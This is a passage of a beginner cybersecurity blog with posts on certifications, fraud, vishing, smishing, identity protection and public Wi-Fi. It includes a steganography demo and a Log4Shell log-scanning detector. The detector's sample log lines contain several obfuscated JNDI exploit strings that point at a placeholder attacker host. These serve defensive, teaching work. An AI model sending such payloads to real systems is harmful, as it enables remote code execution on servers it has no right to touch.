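    return bytes(((x * 3 + y * 5) & 0xFF) for y in range(height) for x in range(width))


if __name__ == "__main__":
    cover = make_cover()
    stego = embed(cover, b"meet at 0900")
    print(extract(stego), "max pixel change:", max_pixel_change(cover, stego))
```

Because each pixel changes by at most one intensity level, the stego-image is visually indistinguishable from the cover, which is the appeal of LSB. The weakness is that the trick only survives lossless formats such as PNG or BMP; saving the result as a JPEG recompresses the pixels and destroys the hidden bits, which is why JPEG and video schemes embed in DCT coefficients instead. Note also that this bit-for-bit scheme has no stego-key: anyone who suspects LSB embedding can run extract() themselves, so a sensitive payload should be encrypted before it is hidden.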
References:
Merriam-Webster. (2018). Definition of STEGANOGRAPHY. [online] Merriam-webster.com.
Simplilearn. (2021). What is Steganography? Types, Techniques, Examples & Applications. [online] Simplilearn.com.
Stanger, J. (2020). The Ancient Practice of Steganography: What Is It, How Is It Used and Why Do Cybersecurity Pros Need to Understand It. [online] CompTIA.
Tutorialspoint. (n.d.). What are the techniques of Text Steganography in Information Security? [online] [Accessed 28 Dec. 2022].
GeeksforGeeks. (2019). Image Steganography in Cryptography. [online] GeeksforGeeks.
DEC 14, 2022
Starting In IT first? Check Out These Free Resources!
by Eula Chua
December 14, 2022
I have heard this question (or a similar one) repeated many times: "How can you protect something if you don't know how it works?"
In a way, this holds true. How do you know what systems to protect? What parts of the networks or systems are vulnerable or at risk if something were to happen?
As someone in pursuit of a career in cybersecurity, I first made the goal to start in an IT role before I continue down the path. As a hands-on learner, I want to learn and understand the ins and outs, the network infrastructures, the vendors used, hardware, software, the issues that end-users may encounter on a daily basis, literally everything within a company. Surely, there are ways to transition into cybersecurity from a completely different industry or right out of graduation and there are wonderful and reputable industry professionals on LinkedIn who speak on this.
However, if you’re someone like me looking to start in IT or review the fundamentals, here are some great free resources I highly recommend:
KevTech IT Support: Kevtech IT Support
Kevin from KevTech IT Support shares valuable information to help those transitioning into IT prepare for their first job: how to build your resume, IT FAQs, common IT interview questions, how to build your own virtual home lab, and more. He also runs a community on Discord.
East Charmer: East Charmer
If you want to know what a day in the life of an IT professional looks like, Marie from East Charmer makes videos showing on-the-job responsibilities. She also makes videos to help those seeking an IT support role, gives a glimpse of working in the office versus working from home, discusses the challenges and difficulties faced in the role, and shares IT best practices.
RunCMD (formerly: IT Career Questions): RUN CMD
Zach from RunCMD gives you all the insights into IT, such as knowing which certifications and roadmap to take, which trending skills and topics to dive into, home labs you can start building, and basically everything you need to know to get into IT.
Cobuman: Cobuman
If you want to get super technical, Cobuman is your go-to. Ranging from teaching you how to prepare for your next IT interview or certification to providing tips on help desk issues you may encounter on the job, Cobuman is ready to help you get a head start into your IT career.
NetworkChuck: NetworkChuck
If you want to learn scripting, hacking, and everything tech related, check out Chuck from NetworkChuck on YouTube. He provides fun and informative videos on many different topics, like Linux, CCNA, Docker, Raspberry Pi, cloud, certifications, and more.
CBT Nuggets: CBT Nuggets
CBT Nuggets is a subscription-based, on-demand IT training platform that also publishes free videos. Its courses from industry experts help you study for your next IT certification or gain real-world IT skills.
Have I missed anything else that should be on this list?
Follow us on Cybersecurity Central on LinkedIn and let us know what else we can add!
DEC 7, 2022
CompTIA Network+ vs CCNA?: A Quick Learning Update
by Eula Chua
December 7, 2022
The past few months have been so focused on studying for Security+ that it has been a while since I reviewed the fundamentals of networking. This month, I have decided to study and relearn some IT networking concepts in order to fully understand what those entering the IT field (or already in it) will be protecting. I haven't decided whether I want to sit a certification exam, or which one, but I do have the study materials to continue my independent learning. The two networking certifications that are most sought after (the industry standard) are CompTIA Network+ and the Cisco Certified Network Associate (CCNA), which will be the focus of today's blog.
If you are thinking about getting a networking certification (or just studying for one) and can't decide which to take, I'll share a few of the main differences and some resources that may help you determine which certification is right for you and meets your needs.
CompTIA Network+:
Vendor-neutral approach (knowledge covers a wide range of systems or tools)
Prepares you for several IT job roles (e.g. systems administrator, network engineer)
Great certificate to start with for those new to IT
Teaches business skills that are highly sought out
Knowledge-based exam
Exam allows approximately 90 minutes to complete
CCNA:
Concentrates on technical skills
Product-specific: provides an in-depth knowledge of networking skills on Cisco systems
Focuses on hands-on/practical exercises
Great certificate for those looking into a career in Networking
Exclusive to Cisco products and tools
Exam allows approximately 120 minutes to complete
Resources:
Best Beginner Networking Certification 2022 (RUN CMD): https://youtu.be/35EC8KxYb4I
Network+ vs. CCNA (Data Knox): https://youtu.be/Wb1A6LkYy1g
CompTIA Network+ vs. CCNA: Why IT Pros Should Earn CompTIA Network+ First. (n.d.). Default. Retrieved December 5, 2022, from https://www.comptia.org/blog/comptia-network-vs.-ccna
Greaves, R. (2020, July 17). CCNA vs Network+: Main Differences and Which to Choose. IT Career Central. https://itcareercentral.com/ccna-vs-network/#Main_Differences_Between_CCNA_vs_Network
NOV 30, 2022
2022 Reflections
by Eula Chua
November 30, 2022
This blog post will be a bit different than usual.
As you read this, December is literally a day away.
It’s easy to get into the loop of thinking that we haven’t done everything we wanted to do on our list for this year or maybe, we didn’t even have an exact plan to begin with and feel a bit all over the place. That is okay. Things happen and sometimes, the pivots we made may have been necessary.
This year, I took a step forward to dive into the world of cybersecurity. I can tell you for a fact that I had no exact direction to begin with but went in anyway. I took my time researching most of the resources I found and fixed up my LinkedIn profile, which led me to connect with many wonderful cybersecurity communities online.
As long as you take action one step at a time, one thing leads to another and before you know it, you’ve done more than many others who are stuck overthinking which moves to make. If you need somewhere to start, I recommend checking out our Resources page here in Cybersecurity Central.
I invite you to reflect with me and look back on our own journey this year. This way, we can get a sense of where we are, how we got here, and what we are looking forward to in 2023.
Feel free to take some notes and answer the following reflection questions:
What/Who am I grateful for this year?
What are some challenges I faced and overcame?
What are some big and small wins I have accomplished this year?
How have I grown this year (physically, mentally, spiritually, and emotionally)?
How have I contributed positively to my communities/workplace/family/friends…?
For more thought-provoking questions, check out this article by Indeed:
100 Student Reflection Questions You Can Ask Yourself
I hope these questions help you discover new and amazing things about yourself!
NOV 16, 2022
Get Ready for the Holidays and Potential Cyber Attacks
by Eula Chua
November 16, 2022
We’re heading into the most wonderful time of the year. While some of us are getting ready for our upcoming Thanksgiving dinners, others are already preparing Christmas presents. Either everything goes smoothly or it doesn’t.
You may ask, “what do the holidays even have to do with cybersecurity?”
Everything.
Think about it. Retail shops are busy stocking up for the holiday sales. We’re busy deciding what gifts to buy for each family member, or panicking about what to cook for our upcoming dinner gatherings. Others are getting ready to fly out on vacation. And those are just a few examples.
While we’re occupied with a million things to do during this season, adversaries are also doing the same.
Have you heard of the Log4J vulnerability, Log4Shell?
Log4j is an open-source logging library for Java, maintained by the Apache Software Foundation and used by a huge number of applications and servers to record what they are doing. The Log4Shell vulnerability (CVE-2021-44228) was disclosed in December 2021. Affected versions of Log4j 2 treated a lookup string such as ${jndi:ldap://...} inside a logged message as an instruction to contact the named server and load code from it, so an attacker who could get such a string written to a log (by placing it in an HTTP header, a username field, or any other value the application logs) could remotely execute code on the server. Because it was being exploited in the wild before a patch existed, it is called a zero-day vulnerability. It was fixed in Log4j 2.15.0 and hardened further in later releases.
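As an added example, not from the original post or its sources, here is how a defender might hunt for Log4Shell attempts in web-server logs with Python. Log4j resolves nested lookups such as ${lower:j} and ${::-j} before it performs the JNDI lookup, so attackers used them to hide the word "jndi" from simple string matching; the detector below collapses those lookups first and only then looks for the JNDI pattern. The log lines are constructed for the example, attacker.example is a placeholder host, and the helper names are this example's own.

```python
# Added example (not from the original post): a detector for Log4Shell-style
# lookup strings in log lines. Log4Shell (CVE-2021-44228) fires when a
# vulnerable Log4j 2 logs a string containing ${jndi:<scheme>://...}. Attackers
# obfuscate it with nested lookups such as ${lower:j} or ${::-j}, which Log4j
# resolves before the JNDI lookup, so a naive search for "jndi" misses them.
import re

# A ${...} with no nested ${...} inside it: the innermost lookup.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# After normalization: a JNDI lookup and the scheme it names (ldap, rmi, dns, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def _resolve(token: str) -> str:
    """Evaluate one innermost lookup the way Log4j's string interpolation would.

    Only the forms attackers use for obfuscation are implemented here:
      ${prefix:key:-default} -> default   (covers ${::-x} and ${env:NOPE:-x})
      ${lower:text}          -> text.lower()
      ${upper:text}          -> text.upper()
    Anything else (${jndi:...} itself, ${date:...}, ...) is left intact.
    """
    if ":-" in token:
        return token.split(":-", 1)[1]
    head, sep, rest = token.partition(":")
    if sep and head.lower() == "lower":
        return rest.lower()
    if sep and head.lower() == "upper":
        return rest.upper()
    return "${" + token + "}"


def normalize(text: str) -> str:
    """Repeatedly collapse innermost lookups until the text stops changing."""
    while True:
        collapsed = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if collapsed == text:
            return text
        text = collapsed


def find_jndi(line: str):
    """Return the JNDI scheme (e.g. 'ldap') if the line carries a lookup, else None."""
    match = _JNDI.search(normalize(line))
    return match.group(1).lower() if match else None


def scan(lines):
    """Return (line_index, scheme) for every line that contains a JNDI lookup."""
    hits = []
    for index, line in enumerate(lines):
        scheme = find_jndi(line)
        if scheme:
            hits.append((index, scheme))
    return hits


# Constructed web-server access-log lines (not real traffic). The attacker's
# string rides in the User-Agent field, one of the values apps commonly log.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:13:01:02 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:13:01:07 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - [10/Dec/2021:13:01:09 +0000] "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:RMI}://attacker.example/b}"',
    '10.0.0.8 - - [10/Dec/2021:13:01:11 +0000] "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-d}ns://attacker.example/c}"',
    '10.0.0.9 - - [10/Dec/2021:13:01:15 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 "curl/7.79.1"',
]

if __name__ == "__main__":
    for index, scheme in scan(SAMPLE_LOGS):
        print(f"line {index}: JNDI lookup via {scheme}")
```

A hit means someone tried, not that the attempt worked: a patched Log4j (2.15.0 or later, and preferably 2.17.1 or later) ignores the string. The resolver handles only the obfuscations listed in its docstring; real traffic also arrives URL-encoded or split across several headers, so decode before scanning and run the check over every field the application logs, not just the User-Agent.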
How about the Cadbury Easter Egg Scam?
Around April 2022, a message with a phishing link circulated widely on WhatsApp, advertising that consumers would receive a free Easter chocolate basket from Cadbury. Clicking the link led to a web page that asked you to fill in your personal data. Cadbury eventually found out and issued a public alert.
If you noticed, both situations occurred near or during a holiday. Attackers very well know that people have a lot on their plates during busier seasons like these. By adding more on top of that, they would hope we’d fall into their traps.
How can we prepare for what’s to come? The best way to prevent this is awareness.
We don’t know what we don’t know. Awareness will help lead us to our solution.
Stay on top of the cyber attacks and learn about what occurs during holidays. Here are some great resources (but not limited to) that you can look into (some of these also include examples from the past):
5 Scams to look out for this Holiday season (Forbes): How To Avoid Getting Scammed During The Holidays
Holiday Cyber crime statistics (Norton): Holiday cybercrime statistics + tips to protect against threats
Cyber attacks during Holidays (ThriveDX): Cyber Attacks During Holidays: Why the Spike?
Learn about the social engineering tactics and how attackers use this against us:
Social Engineering (Okta): Social Engineering: How It Works, Examples & Prevention | Okta
Learn how to prevent scams from happening:
Holiday Scams (FBI): Holiday Scams | Federal Bureau of Investigation
7 Holiday Security Tips To Try Before The Year Ends(Security Intelligence): 7 Holiday Cybersecurity Tips to Try Before The Year Ends
Check out the rest of our Blog By CC page below for more cybersecurity topics!
References:
Dynatrace News. (2021, December 17). What is Log4Shell? The Log4j vulnerability explained (and what to do about it).
Lekhi, A. (n.d.). Log4J Vulnerability: What, Why and How. Gca.isa.org.
Beyond The Security Alert Dance: Learn Some Useful Steps. (n.d.).
Published, K. C. (2022, April 5). Cadbury issue warning over Easter egg scam on WhatsApp. GoodTo.
Trend Micro News. [Scam Alert] Free Cadbury Easter Chocolate Basket Scam.
NOV 9, 2022
Resources and Tips to Help You Study for Your CompTIA Security+ Exam
by Eula Chua
November 9, 2022
Leading up to it, I had doubted myself. I didn’t think I was going to pass because my study habits weren’t perfect. But I remembered the commitment I had made to myself at the beginning of this cybersecurity journey: to pass this exam, even if it took me multiple attempts.
I’m happy to share that last month I finally earned my very first cybersecurity certification: CompTIA Security+ SY0-601. Passing this exam truly affirmed my decision to begin a career in this field. The learning never stops.
Although everyone has their own way of studying, I want to share with you the resources and tips that have helped me successfully pass this exam. I cannot guarantee that you will pass the exam as what I’m sharing is based on my own experience, however, with the amount of time and work you put in, your success and efforts will show in the results. I hope that what I share helps you in any way.
Resources
The first thing I did was research and find the Security+ study material that worked for me. This took some time until I finally decided which courses and practice exams to stick to. There are a lot of free and affordable resources out there, especially on YouTube and Udemy, and it can get overwhelming. Know your learning style and choose accordingly. Check out this page to learn about different learning styles: VAK
For myself, I learn best by doing all three: learning by seeing/writing, listening, and doing. I made sure to use resources that would aid me in my learning. I chose multiple resources to ensure each topic is fully covered in-depth and explained in different ways to help me understand the concepts. Most of the courses listed include additional hands-on labs that are not a part of the exam but are there to reinforce your learning.
Here are the resources that have helped me:
For visual/auditory learning (learning by seeing/writing and listening):
Jason Dion’s CompTIA Security+ (SY0-601) Complete Course and Exam: CompTIA Security+ Complete Training Course & Practice Exam
Darril Gibson’s CompTIA Security+ Get Certified Get Ahead Sy0-601 Study Guide: About Security+ SY0-601 - Get Certified Get Ahead
Professor Messer’s CompTIA Security+ SY0-601 Training Course: CompTIA Security+ SY0-601 Training Course
For kinesthetic learning (learn by doing):
Jason Dion’s CompTIA Security+ (SY0-601) Practice Exams & Simulated PBQs: CompTIA Security+ (SY0-601) Practice Exams & Simulated PBQs
Professor Messer: Professor Messer's CompTIA SY0-601 Security+ Success Bundle - Professor Messer IT Certification Training Courses
DojoLab - PBQ practice exams: CompTIA Security+ SY0-601 PBQs, Certification Tests & Labs
Here are other highly recommended resources that you may also prefer:
Ian Neil’s Security+ Study Guide: Home
Mike Meyers and Dan Lachance’s Total CompTIA Security+ Certification (SY0-601): TOTAL: CompTIA Security+ Certification (SY0-601)
Mike Chapple’s Security+ resources: Security+ Study Group - CertMike
Pocket Prep’s Security+ Practice Exam: CompTIA® Security+
LearnZapp’s CompTIA Security+ SY0-601 Prep (iOS and Android): Learnzapp - CompTIA Security+ SY0-601 Exam Prep Mobile App - Darril Gibson
CompTIA Official CertMaster: CertMaster Practice for Security+ Exam Prep | CompTIA IT Certifications
Tips
You can use multiple study materials. It might be better as some instructors provide in-depth information and examples about a topic whereas others briefly go through it. But if one is enough, do what works for you.
CompTIA publishes the full list of exam objectives and acronyms for Security+. Use it to your advantage and check off each objective as you cover it. You can find it here: Exam Objectives
Create a study schedule/timeline. It’s okay to fall off the tracks when it comes to studying. Having a timeline will help you get back on track and stay consistent.
Check for discount vouchers included in the courses/study material you purchased. Most authorized instructors will include a discount voucher for your exam.
Schedule your exam ahead of time. This will help you stay accountable in your studies. If you don’t, you might not end up doing it. Depending on the organization, you might be able to reschedule if the original date you set no longer works for you.
The exam is composed of multiple-choice questions (MCQs) and performance-based questions (PBQs), such as matching, drag-and-drop, and fill-in-the-blank tasks. Many suggest answering the MCQs first and leaving the PBQs for last, as they can be time-consuming. More information about the exam format is available on the official CompTIA website.
You’ll see others recommend taking the exam after 1 month of studying. Some recommend 9 months. Everyone has their own pace. Focus on your path and choose a timeline that works best for you.
Stay focused and believe in yourself.
Want to study with us? Subscribe to Cybersecurity Central on Youtube and get notified for our #SecurityFriday videos: Cybersecurity Central
Are you thinking of taking the CompTIA Security+ certification? Let us know how you do on our LinkedIn post: https://www.linkedin.com/company/cybersecuritycentralorg/
Good luck with all your studies!
Check out Resources by CC for even more learning tech and infosec resources!
NOV 2, 2022
Credit Card Fraud: Tips For Prevention
by Eula Chua
November 2, 2022
Black Friday, Cyber Monday, and Boxing Day are coming before we know it. As we head into the holiday shopping season, I want to bring some awareness to credit card fraud.
As reported in the 2020 Federal Trade Commission Report, credit card fraud is ranked as one of the main types of identity theft reported and continues to rise.
Credit card fraud is the unauthorized use of another person’s credit card or card details, without their knowledge, to make purchases, withdraw funds, or open new accounts in their name. The fraudster’s motive is financial gain.
Credit card frauds happen more often than we think. To get a grasp of how it’s looking, check out Card Rates.com: 15 Disturbing Credit Card Fraud Statistics
Credit card fraud can occur in multiple ways, not limited to:
CNP (Card-Not-Present) Fraud: Someone uses your credit card without physically having it. This is possible if the fraudster knows your full card details (account number, expiry date, and card verification code) and can be done by mail order, over the phone, or online.
Account Takeover: Building on stolen personal details, the attacker contacts the card issuer and passes identity verification as the account owner. They can then change the mailing address on file and request a replacement card to use and abuse.
Stolen/Lost Credit Card Fraud: A criminal who finds or steals a card may have trouble making in-person purchases where a PIN is required, but the details printed on the card are still enough for online purchases.
Credit Card Skimming: A skimmer, a small reading device attached to or placed over a legitimate card terminal or ATM, copies the details stored on the card’s magnetic stripe when it is swiped; a hidden camera or keypad overlay may capture the PIN at the same time.
Mail Non-Receipt Card Fraud: If a new or replacement card is mailed to you, a criminal may intercept it from your mailbox. Once they have it, they can activate the card and abuse it.
Although large companies have fraud investigation and data loss prevention teams working endlessly behind the scenes, doing our part as users and cardholders, in combination with those back-end teams, is what effectively prevents credit card fraud from happening to us.
What can we do right now?
Here are some practical tips we can do to prevent or to stop credit card fraud:
When you notice suspicious activity on your account, call your credit card company as soon as possible, have them cancel the card, and request a replacement. Use the phone number printed on the back of the card or on your statement, not one from a text or e-mail.
Always check the machine you’re inserting your card into. Do the other machines around it look the same? Are there any external attachments, loose parts, or overlays on the card slot or keypad? Cover the keypad with your other hand when entering your PIN.
Ensure your PIN is not a common one, or one you have already used for other accounts.
For online banking, review the password policy and requirements of your bank and ensure you are using proper password hygiene. (To read more about password management, read my blog post here: CYBERSECURITYCENTRAL - Blog by CC)
Protect your information. Do not share your credit card or the documents associated with it with anyone, not even your closest loved ones.
Ensure your credit card is kept at a safe place after each use.
Resources:
Sandberg, E. (2020, August 24). 15 Disturbing Credit Card Fraud Statistics. CardRates.com.
Helbock, M. (2019). 11 Common Types Of Credit Card Scams & Fraud | ConsumerProtect.com
OCT 26, 2022
Vishing Attacks in Depth
by Eula Chua
October 26, 2022
Once upon a time, we lived in a world without caller ID. Every time the phone rang, all we could do was answer it, hoping it wouldn’t be a random stranger trying to impersonate a service provider. It was highly likely that an adversary would pull this scam tactic.
You might ask, what is vishing?
Vishing, a portmanteau of “voice phishing”, is a form of phishing in which an attacker uses the phone system to lure targets into handing over personal information or credentials, mainly for financial gain. Caller ID made it easier to decide which calls to trust based on the numbers we recognize, but caller ID was never designed as an authentication mechanism and is easy to spoof, so the attacks never went away. Today these attacks are often made over VoIP (Voice over IP), which lets the attacker display a known company’s number as the caller ID and set up disposable numbers that are difficult to trace.
In a vishing attack, the adversary falsifies their identity by posing as a person of authority, such as a bank employee, a government agent, or tech support. The vishing attacks most people hear about are tech support scams and automated, scare-tactic voice messages. Vishing is often one stage of a larger operation: the details it harvests feed identity fraud, or the call persuades the victim to install remote-access software that becomes the entry point for ransomware.
So, do they still happen?
The answer is yes.
Although e-mail phishing is more common, according to Kroll (2022) vishing attacks have been on the rise, especially in 2022, and have been “occurring more than 1-in-4 times out of all types of response-based threats.” The more technology develops, the more sophisticated and motivated adversaries become in finding new ways to mount these attacks.
Below are some key patterns we all need to be aware of when encountering potential vishing attacks. For some extra context, here is a list of vishing attack principles compiled by the experts of Kroll (The Rise of Vishing and Smishing Attacks – The Monitor, Issue 21 | Kroll) for reference:
Urgency - Creating a sense of urgency creates stress and overwhelms the target so they are likely to give in to what is being requested.
Retrieving Sensitive Information - Personal or sensitive information is what the adversary is after, to use for monetary gain. Legitimate organizations do not ask for full credit card numbers or social security numbers on an unsolicited call. If a caller does, treat it as an indicator of vishing.
Request for Computer Access - A common indicator of tech support or fake virus scams. Legitimate organizations do not call unprompted and ask for remote access to your device.
Claims of Legitimacy - The caller invokes a reputable organization, or details that make the call look genuine, to gain the target’s trust. Once trust is established, the victim is likely to share whatever is asked for next.
Voice Synthesizing - This is used to conceal an adversary’s identity when speaking to a target. Voice distortion may indicate a scam.
To avoid falling for vishing attacks, it is important to be aware of the characteristics and traits. Knowing how an attack works gives users the advantage to prevent future cyber incidents.
A few key points to remember:
If the number is unfamiliar, be cautious about what you say to the caller
Take the time to look up where the phone number or area code is from
Avoid sharing personal or sensitive information, such as account numbers, your SIN/SSN, or passwords
Let calls from unknown numbers go to voicemail
If a caller claims to be from your bank or another institution, hang up and call back using the number printed on your card, your statement, or the organization’s official website; a familiar-looking caller ID proves nothing
As we are in the last week of Cybersecurity Awareness Month, let’s continue to strive staying safe online. Continue to protect your information and always stay vigilant. As mentioned earlier, the more technology develops, the more threat actors discover ways to trick users.
Remember, cybersecurity criminals never sleep! #Becybersafe all year round and keep an eye out for more related content here at Cybersecurity Central!
OCT 19, 2022
Analyzing a Smishing Attack
by Eula Chua
October 19, 2022
Phishing attacks have become more sophisticated and have found their way to other avenues. This week, I will help you analyze a smishing attack.
A Smishing attack is part of the phishing family. It’s a cyber attack where text messages are sent by an attacker to trick victims into clicking a malicious link, sharing sensitive information, or sending money to a “trusted” organization. The characteristics and motives are almost identical except for the fact that it’s sent via SMS. Smishing can also be used to obtain verification codes if the target’s phone is used for multi-factor authentication for their credentials.
Text messages have nothing like the spam filtering applied to e-mail, and SMS carries no sender authentication, so smishing messages arrive unfiltered and are more likely to be opened by users who cannot tell whether they are spam.
The following image is an example of a text message I received from someone claiming to be the “Canada Revenue Agency” (CRA). In the United States, the equivalent would be the IRS (Internal Revenue Service). From a user’s perspective, it can be hard to tell whether this is really coming from the agency.
In regards to this example, here are some questions to ask:
Is this the right phone number for the organization they are claiming to be?
What is the number for the CRA?
Would the CRA actually state the amount of money owed?
Is the phone number this text came from actually registered to the CRA?
Is the CRA actually partnered with Interac?
Smishing schemes are made to create doubt in our thought process. This is one of the main tactics of conducting a successful attack. To help combat this, the questions you ask yourself will lead you to make the right judgement, especially if you’re not sure when you encounter a text message like this. I recommend approaching text messages like these with a curious mind. Think critically and ask yourself questions. If you feel like something is fishy, then you’re probably right.
Instead of me listing out what may be suspicious about this, I want you to try figuring out this one. Take out a pen and paper or your digital notes. What are some of the red flags you see in this text message?
Share it with us by snapping a photo or a screenshot and send it in our LinkedIn comments section of this week’s #BlogByCC post!
SEP 28, 2022
Cybersecurity Awareness All Year Round
by Eula Chua
September 28, 2022
We have a lot coming for you this October for Cybersecurity Awareness Month. To get you prepared for what’s to come, here’s a quick background of what Cybersecurity Awareness Month is about.
In October 2004, Cybersecurity Awareness month was established as a joint initiative by the National Cybersecurity Alliance and the U.S. Department of Homeland Security.
With the continuous rise of confidential data being uploaded online and the rise of current and upcoming cyber threats, this month is about creating awareness to help all types of users stay safe and protected online.
This year's campaign theme is “See Yourself in Cyber.” Technology continues to adapt and improve every single day, but this year’s focus is on putting people first in cybersecurity. Whether we are developers, administrators, or end users, we all play a part. It’s important to highlight the preventive measures we can take to protect our privacy and data online, in the hope of building a safer cyberspace together. For more information, check out:
Cybersecurity Awareness Month | CISA
Although we have a whole month dedicated to cybersecurity awareness, did you know there are other days where we can celebrate it all year round? Here are more days to add to your calendar (the dates below are for 2022; several of these, such as Safer Internet Day, Identity Management Day, and World Password Day, move each year):
January 24th to 28th: Data Privacy Week
February 8th: Safer Internet Day
February 14th: National Clean Out Your Computer Day
March 31st: World Back-up Day
April 12th: Identity Management Day
May 5th: World Password Day
All of October: Security Awareness Month
October 29th: National Internet Day
November 13th to 19th: International Fraud Awareness Week
November 30th: Computer Security Day
Are you participating in this year’s Cybersecurity Awareness Month?
Connect with us on Cybersecurity Central's socials and tell us about it!
CC on LinkedIn: https://linkedin.com/company/cybersecuritycentralorg
CC on Twitter: https://twitter.com/cybersecuritycc
CC on YouTube: https://youtube.com/cybersecuritycentral
SEP 21, 2022
Staying Safe in the Digital World
by Eula Chua
September 21, 2022
Not many realize it, but the need for cybersecurity has increased in today’s world and will continue to increase as technology progresses.
Earlier this week, I encountered an elderly client who told me that he did not want to give out his email address unless it was absolutely necessary. This led him to share a deepfake AI incident he had heard about, where another elderly person was lured into believing that the service provider she was communicating with was the “actual” service provider, when in fact it was a scam. She lost thousands of dollars and had little support. It was devastating to hear, but even more devastating to know that incidents like this happen daily without our even knowing.
I decided to pursue the path of cybersecurity in early spring of this year. It has become more and more evident to me how important it is to implement security at every level, from your personal devices and home networks to small and medium-sized businesses, large corporations, and industrial control systems, and to create awareness tailored to each age group.
Consider the quote “Your internal reality becomes your external reality” (Unknown). It applies everywhere, even in the cyber world. If the internal systems are flawed or compromised, it might show as a data breach, a business closure, or a financial loss.
If you haven't been keeping up with Simply Cyber’s Daily Cyber News Brief every weekday, you are missing out! First of all, the community never has a dull moment; second, there is always something happening in the digital world that we don’t hear about on mainstream news. Technology changes every day. Being informed about what is happening is an effective way to learn how to prevent ourselves from getting compromised.
As we approach Cybersecurity Awareness Month in October, below are some great resources to better prepare ourselves and help protect one another from online incidents:
National Cybersecurity Alliance (US): Home - National Cybersecurity Alliance
National Public Awareness Campaign (Government of Canada): Get Cyber Safe
Layer 8 Security Champions (UK): Champions Hub Membership
Read my previous blog post on End-User Awareness at CYBERSECURITYCENTRAL - Blog by CC
Cybersecurity Central is proud to be an official 2022 Cybersecurity Awareness Month Champion organization with National Cybersecurity Alliance.
There’s no better time to start than now. Stay safe, stay aware, and stay secure.
SEP 7, 2022
Offline vs. Online Identities
by Eula Chua
September 14, 2022
Did you know you have two identities? Well, technically, it’s two parts of one identity. Don’t worry, I didn’t know either, but it turns out that the identity we normally refer to is only half of what we have. Many forget that our digital identity counts and is just as important as our real-life identity.
Let’s call them: offline and online. So, what’s the difference?
Our offline identity is what we mostly refer to. It is who we are, our real-life personas, and how others know us. This is the identity we use at home, at work, or at school. The offline identity includes personal details of our life that even our friends and family might know, such as our full name, date of birth, age, address, and even our favourite colours.
Our online identity is the digital identity we carry; it indicates who we are and how we present ourselves online. This is our online persona, and it can include the usernames, email addresses, or aliases for our accounts. The moment we are active on the web is the moment our online identity is established, regardless of whether we create an account or not.
It’s important to keep in mind that both identities should be secured, as each one comes with different risks. Even if one is well secured, a weakness in the other still poses a risk, because both offline and online identities can be entry points, or an attack surface, for someone targeting us.
What preventive measures can we take to protect our offline and online identities?
Awareness is key. Let’s first look into social engineering.
Social engineering attacks are a common way to obtain information by manipulating people rather than systems. We will look into the specifics of social engineering attacks in the future; for this topic, we will focus on shoulder surfing.
Shoulder surfing is a type of social engineering attack where someone casually observes over the shoulder of another person to obtain information they are not authorized to see. It is a simple technique used to gather sensitive information, such as credentials, or for monetary gain, and it often happens in office environments.
Check out some practical ways to prevent shoulder surfing:
Position screen monitors in a way where other unauthorized personnel are unable to see them (away from windows, counters, or open spaces)
Adjust the screen brightness or use a privacy filter that attaches to the monitor to restrict the visibility of the screen to the people around you
To further protect our identity, we should also avoid the following:
Personal information in our usernames or passwords
Full name, if not required
Parts of our address and phone number
The same username and password combinations, especially for our financial accounts
Very unusual usernames reused across other accounts, as these are easy to track from one service to another
Usernames that contain password clues or consecutive patterns, for example a series of numbers and letters, or the first half of a two-part phrase
Now that we know that our identity is split into two parts, let’s make sure we protect both identities as best as we can. Help us spread awareness by sharing our blog to your network!
To learn more about your digital identity, check out the references below.
References:
Digital identity for individuals. (2017). NIST. https://www.nist.gov/itl/applied-cybersecurity/tig/digital-identity-individuals
Gibson, D. (2020). CompTIA Security+: Get Certified Get Ahead SY0-601 Study Guide. YCDA, LLC.
Introduction to Cybersecurity. (2018, January 22). Networking Academy. https://www.netacad.com/courses/cybersecurity/introduction-cybersecurity
SEP 7, 2022
Common Attacks on Public Wi-Fi
by Eula Chua
September 7, 2022
From an end user’s perspective, it can be exciting when we find that free Wi-Fi is available. Unfortunately, “free” does not always mean it’s safe to use. In today’s blog, we will build on last week’s topic, Public Wi-Fi is Not Your Friend, and highlight some of the risks of using public Wi-Fi.
Although there are many risks that can occur, we will focus on the following three common attacks:
Identity Theft
Man-In-The-Middle Attack (aka On-Path Attack)
Session Hijacking
Identity Theft
We often use our identity to verify who we truly are in order to open or access important accounts, such as our bank accounts. It is crucial that we keep our personal information safe to prevent others from stealing it. This is what identity theft is: someone steals your personal information, such as your name, address, credit card information, social security number, health insurance number, and more. Those who steal this sensitive information often use it to commit identity fraud for financial gain. To prevent identity theft, especially on public Wi-Fi, avoid visiting websites where you’re required to fill in personal information or bank login credentials.
On-Path Attack/Man-In-The-Middle Attack
On an open connection, there can be a flood of network packets travelling within that network, all coming from different devices. This makes it susceptible to an on-path attack, where a different, and possibly malicious, computer intercepts the connection between two other computers on the same network. This is a form of active eavesdropping. Be aware that unusual activity, such as large amounts of data transferring over public Wi-Fi, may indicate an on-path attack. For prevention, devices should be equipped with anti-malware software, a firewall, and intrusion detection. As with any device, ensure that strong passwords are always used and that software is regularly patched and updated.
Session Hijacking
Session hijacking is similar to the on-path attack. The goal is to steal personal information, execute a denial-of-service attack, or infect a system with malware. Rather than intercepting traffic between two computers, the attacker takes over the connection between your computer and a website’s server by recording your session ID. Session IDs may be attached to links or to the requests sent to the websites you visit. Session hijacking attacks are grouped into three types, active, passive, and hybrid, each conducted with different techniques. To reduce the risk: avoid clicking links you’re unsure about; log out of your accounts at the end of each session so the session is terminated; install a firewall and anti-virus software on your device; make sure the websites you visit are secured, with URLs beginning with “HTTPS”; and, last but not least, use a VPN (virtual private network), which makes it more difficult for an attacker on the same network to intercept your traffic.
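To make the defensive side of this concrete, here is an added example (not code from the original post) of how a website can issue and terminate sessions so that a recorded session ID is of little use: the ID travels only in a cookie marked for HTTPS, never in a link, and logging out destroys it on the server. The idle timeout and cookie attributes are assumed values.

```python
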